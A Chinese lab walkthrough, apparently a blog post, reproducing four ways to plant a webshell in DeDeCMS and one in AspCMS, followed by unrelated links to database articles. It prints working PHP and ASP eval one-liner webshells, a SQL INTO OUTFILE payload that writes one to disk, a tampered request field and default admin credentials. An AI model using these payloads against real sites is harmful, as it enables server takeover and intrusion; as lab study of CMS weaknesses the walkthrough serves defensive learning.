dedecms(四种webshell姿势)aspcms webshell漏洞复现

dedecms

我们首先访问靶场

姿势1上传文件getshell

首先登录后台

点击文件管理器》文件上传

写一个php一句话木马文件

然后进行上传

点击上传之后提示上传成功并且目录里也显示了我们刚刚上传的文件,并且最上面有显示文件的路径

然后我们进行访问并连接

连接成功

姿势2 修改模版文件getshell

点击模版找到index.html 并点击修改

在代码的开头写入php一句话木马,点击保存

然后返回点击生成,修改网页为静态网页

然后进行访问

并连接

姿势3后台任意命令执行getshell

模块》广告管理》增加一个新广告

在广告内容里写入一句话木马

然后点击代码在,里面找到文件的路径

访问并连接

姿势4 sql命令执行写入php木马getshell

点击系统》sql命令执行工具》写入payload

复制代码
select '<?php @eval($_POST[cmd]);?>' into outfile "D:/phpstudy_pro/www/dedecms/2.php"

然后直接访问我们写入的2.php文件并进行连接

aspcms

访问网站出现报错

说明浏览器不会给我们自动访问index网页,那么我们在url后面加上index.asp再进行访问

访问后台管理页面,并使用账号密码登录

admin 123456

然后点击扩展》幻灯片设置》点击保存时进行抓包

在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp

文件内容

1%25><%25Eval(Request(chr(65)))%25><%25 密码为a

然后进行访问并进行连接

使用菜刀进行连接,并成功getshell

相关推荐
noravinsc19 分钟前
connection.cursor() 与 models.objects.filter
数据库·django·原生查询·orm查询
laimaxgg2 小时前
MySQL复合查询
数据库·mysql
编程在手天下我有2 小时前
Redis 常见问题深度剖析与全方位解决方案指南
数据库·redis·缓存·性能优化·数据持久化·分布式系统
辰哥单片机设计3 小时前
JQ6500语音模块详解(STM32)
数据库·mongodb
阿桨4 小时前
【保姆级教程-Centos7环境下部署mongodb并设置开机自启】
数据库·mongodb·centos
lolo大魔王4 小时前
MongoDB的增删改查操作
数据库·mongodb
layman05285 小时前
node.js 实战——mongoDB
数据库·mongodb·node.js
爱可生开源社区6 小时前
SQLShift 全新上线:Oracle→OceanBase 迁移利器
数据库
wkj0016 小时前
java 和 C#操作数据库对比
java·数据库·c#
编程在手天下我有6 小时前
Redis 数据类型全览:特性、场景与操作实例
数据库·redis·数据结构与算法